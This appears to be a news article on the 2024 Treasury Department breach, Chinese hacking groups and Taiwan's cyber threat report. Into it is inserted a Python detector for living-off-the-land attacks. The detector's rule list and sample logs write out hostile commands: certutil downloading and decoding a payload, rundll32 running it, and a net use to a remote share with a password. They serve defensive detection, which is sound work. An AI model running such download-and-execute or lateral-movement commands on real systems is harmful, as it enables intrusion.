The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said on Monday that the recent cyber attack on the Treasury Department did not affect other federal agencies, adding that no evidence has emerged of a broader impact across the federal government.
CISA is closely collaborating with the Treasury Department and BeyondTrust, a cybersecurity solutions provider, to investigate the breach, understand its full scope, and mitigate potential consequences. “The security of federal systems and the data they protect is paramount to national security,” CISA stated, emphasizing its commitment to preventing further incidents. The agency promised to continue monitoring the situation and provide updates when necessary.
The incident follows a declaration by the Treasury Department last week acknowledging that it had been the target of a “major cybersecurity attack.” Preliminary investigations revealed that Chinese state-sponsored hackers exploited a vulnerability, enabling them to gain remote access to specific computers and unclassified information.
Breach Details and BeyondTrust’s Response
The intrusion reportedly began in early December 2024 with the compromise of BeyondTrust’s systems. The attackers used a stolen Remote Support SaaS API key to gain unauthorized access to certain Remote Support SaaS instances. BeyondTrust issued an updated statement on January 6, 2025, confirming that no additional affected customers had been identified beyond those previously notified.
Despite mounting evidence pointing to state-sponsored Chinese attackers, China has denied the accusations. Chinese officials have labeled the allegations as unfounded and politically motivated.
Sanctions Against Chinese Cybersecurity Firm
In a related development, the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) imposed sanctions last week on Integrity Technology Group, a Chinese cybersecurity firm. The company is accused of providing infrastructure support to Flax Typhoon, a hacking group allegedly involved in attacks on U.S. critical infrastructure.
Reacting to the sanctions, Chinese Foreign Ministry spokesperson Guo Jiakun reiterated China’s stance, saying, “China has always firmly opposed hacking and has consistently combated it in accordance with the law.” Guo further accused the U.S. of using cybersecurity issues as a pretext to unjustly sanction Chinese companies and warned that China would take necessary measures to protect its interests.
Integrity Technology Group, in its response, dismissed the U.S. allegations, stating they lack factual basis. The company also filed a formal protest with the Shanghai Stock Exchange.
Escalating Chinese Cyber Threats
The cyber attack on the Treasury Department is part of a larger pattern of intrusions attributed to Chinese hacking groups. Notable among them are Volt Typhoon and Salt Typhoon, known for targeting U.S. critical infrastructure and telecommunications networks, respectively.
Over the weekend, The Wall Street Journal reported that nine telecom companies, including Charter Communications, Consolidated Communications, and Windstream, had been breached by Salt Typhoon. Previously identified victims included major telecom operators like AT&T, T-Mobile, Verizon, and Lumen Technologies.
APT41 Campaign in the Philippines
In a separate development, Bloomberg reported that APT41, another Chinese state-sponsored threat actor, allegedly infiltrated the executive branch of the Philippine government between early 2023 and June 2024, stealing sensitive data related to ongoing territorial disputes in the South China Sea. This campaign is believed to be part of China’s broader cyber espionage efforts in the region.
Taiwan: A Growing Target
Meanwhile, Taiwan’s National Security Bureau (NSB) has issued a warning about the rising frequency and sophistication of cyber attacks from China. The bureau reported 906 cyber incidents against government and private entities in 2024, marking a significant increase from 752 incidents in 2023.
Chinese threat actors reportedly use a variety of tactics to gain unauthorized access to critical systems in Taiwan. These include exploiting vulnerabilities in network communication devices and employing “living-off-the-land” (LotL) techniques, in which the attacker abuses legitimate, already-present administrative tools and system binaries instead of dropping custom malware, so that malicious activity blends in with normal operations and evades signature-based detection.
Attack chains often begin with spear-phishing emails targeting civil servants, followed by lateral movement within compromised networks to steal sensitive information.
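The LotL and lateral-movement tactics described above are what a defender would try to surface in process-creation telemetry, since the binaries involved are legitimate and only their arguments give the activity away. The following is an added example written for this page, not tooling from the NSB or from the report it summarizes; the log line format, the rule list, and the hostnames, users, paths, and IP address are all constructed for illustration. It parses constructed process-creation events, flags command lines that match common LotL abuse patterns, and groups the hits per host so a download, decode, execute, and lateral-movement sequence on one machine stands out as a chain rather than as isolated alerts.

```python
"""Flag living-off-the-land (LotL) process launches in process-creation logs.

Illustrative detector for this page. The rule list and log format are
constructed assumptions, not an NSB-published indicator set.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# (binary name, regex over the full command line, human-readable reason).
# Patterns target argument usage that is rarely legitimate for that binary.
LOTL_RULES = [
    ("certutil.exe", r"-urlcache\b", "certutil used as a downloader"),
    ("certutil.exe", r"-decode\b", "certutil used to decode a payload"),
    ("rundll32.exe", r"javascript:", "rundll32 executing script"),
    ("rundll32.exe", r"\\Users\\[^\s]+\.dll,", "rundll32 loading a DLL from a user profile path"),
    ("regsvr32.exe", r"scrobj\.dll", "regsvr32 scriptlet execution pattern"),
    ("mshta.exe", r"https?://", "mshta fetching a remote HTA"),
    ("powershell.exe", r"-enc(odedcommand)?\b", "encoded PowerShell command"),
    ("powershell.exe", r"DownloadString|Invoke-Expression|\bIEX\b", "PowerShell download cradle"),
    ("wmic.exe", r"process\s+call\s+create", "WMIC process creation (possible remote execution)"),
    ("net.exe", r"\buse\b\s+\\\\", "net use to a remote share (lateral movement)"),
]

# Constructed log format: one process-creation event per line.
LINE_RE = re.compile(r'^host=(\S+) user=(\S+) image="([^"]+)" cmdline="(.*)"$')


@dataclass
class Finding:
    host: str
    user: str
    image: str
    reason: str
    cmdline: str


def parse_line(line: str) -> Optional[dict]:
    """Return the event fields for one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    host, user, image, cmdline = m.groups()
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


def detect(lines: List[str]) -> List[Finding]:
    """Return one Finding per event whose binary and arguments match a LotL rule."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        # Compare on the image file name only, so the install path does not matter.
        binary = ev["image"].rsplit("\\", 1)[-1].lower()
        for rule_bin, pattern, reason in LOTL_RULES:
            if binary == rule_bin and re.search(pattern, ev["cmdline"], re.IGNORECASE):
                findings.append(Finding(ev["host"], ev["user"], binary, reason, ev["cmdline"]))
                break  # first matching rule wins; one finding per event
    return findings


def summarize(findings: List[Finding]) -> Dict[str, List[str]]:
    """Group reasons by host, in event order, so multi-step chains on one host are visible."""
    chains: Dict[str, List[str]] = {}
    for f in findings:
        chains.setdefault(f.host, []).append(f.reason)
    return chains


# Constructed sample events: a download/decode/execute chain on ws01, a lateral
# move from ws02, and benign certutil and notepad use on ws03 that must not alert.
SAMPLE_LOGS = [
    'host=ws01 user=gov\\jlin image="C:\\Windows\\System32\\certutil.exe" cmdline="certutil.exe -urlcache -split -f http://198.51.100.7/update.txt C:\\Users\\Public\\u.txt"',
    'host=ws01 user=gov\\jlin image="C:\\Windows\\System32\\certutil.exe" cmdline="certutil.exe -decode C:\\Users\\Public\\u.txt C:\\Users\\Public\\u.dll"',
    'host=ws01 user=gov\\jlin image="C:\\Windows\\System32\\rundll32.exe" cmdline="rundll32.exe C:\\Users\\Public\\u.dll,Start"',
    'host=ws02 user=gov\\admin image="C:\\Windows\\System32\\net.exe" cmdline="net use \\\\fs01\\c$ /user:gov\\admin Pa55word"',
    'host=ws03 user=gov\\mchen image="C:\\Windows\\System32\\certutil.exe" cmdline="certutil.exe -verify cert.cer"',
    'host=ws03 user=gov\\mchen image="C:\\Windows\\System32\\notepad.exe" cmdline="notepad.exe memo.txt"',
]

if __name__ == "__main__":
    hits = detect(SAMPLE_LOGS)
    for host, reasons in summarize(hits).items():
        print(host)
        for r in reasons:
            print("  -", r)
```

Matching on the binary name plus its arguments, rather than on the binary alone, is what keeps the benign `certutil -verify` on ws03 quiet while the `-urlcache` and `-decode` invocations on ws01 alert; in a real deployment the rule list would be tuned against the environment's own baseline of administrative activity, and the per-host grouping would feed a correlation rule rather than a printout.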
Notable Chinese Cyber Attacks on Taiwan
The NSB identified several prominent types of attacks directed at Taiwan:
- DDoS Attacks: Distributed denial-of-service (DDoS) attacks against Taiwan’s transportation and financial sectors coincided with military exercises by the People’s Liberation Army (PLA).
- Ransomware Attacks: The manufacturing sector has been hit by ransomware campaigns aimed at disrupting production and extracting ransoms.
- High-Tech Espionage: Chinese hackers have targeted high-tech startups to steal proprietary technologies and intellectual property.
- Personal Data Theft: Personal information belonging to Taiwanese citizens has been exfiltrated and subsequently sold on underground forums.
- Disinformation Campaigns: China has been accused of spreading false information on social media to undermine public trust in the government.
The NSB also noted a 650% increase in attacks targeting the telecommunications sector, while attacks on the transportation and defense supply chain sectors have risen by 70% and 57%, respectively.
Influence Operations and Disinformation
Beyond cyber intrusions, China is said to be actively conducting influence operations in Taiwan. These efforts aim to manipulate public opinion and create social divisions by spreading disinformation through inauthentic accounts on platforms like Facebook and X (formerly Twitter).
A notable tactic involves hijacking Taiwanese social media accounts to post misleading information. The NSB reported several instances of deepfake videos featuring fabricated speeches by prominent Taiwanese political figures designed to confuse and mislead the public.
Additionally, China has allegedly set up proxy accounts and media brands on platforms such as Weibo, TikTok, and Instagram. These accounts are reportedly used to promote pro-China narratives and spread propaganda targeting the Taiwanese populace.
Conclusion
The ongoing investigation into the Treasury Department cyber attack underscores the growing threat posed by state-sponsored cyber adversaries. With mounting evidence pointing to Chinese involvement, tensions between the U.S. and China over cybersecurity are likely to escalate further. Simultaneously, the reports from Taiwan highlight the multifaceted nature of modern cyber warfare, encompassing both direct intrusions and influence operations aimed at destabilizing societies.
As cyber attacks continue to rise in frequency and sophistication, the need for robust international cybersecurity collaboration and stronger defensive measures has never been more critical.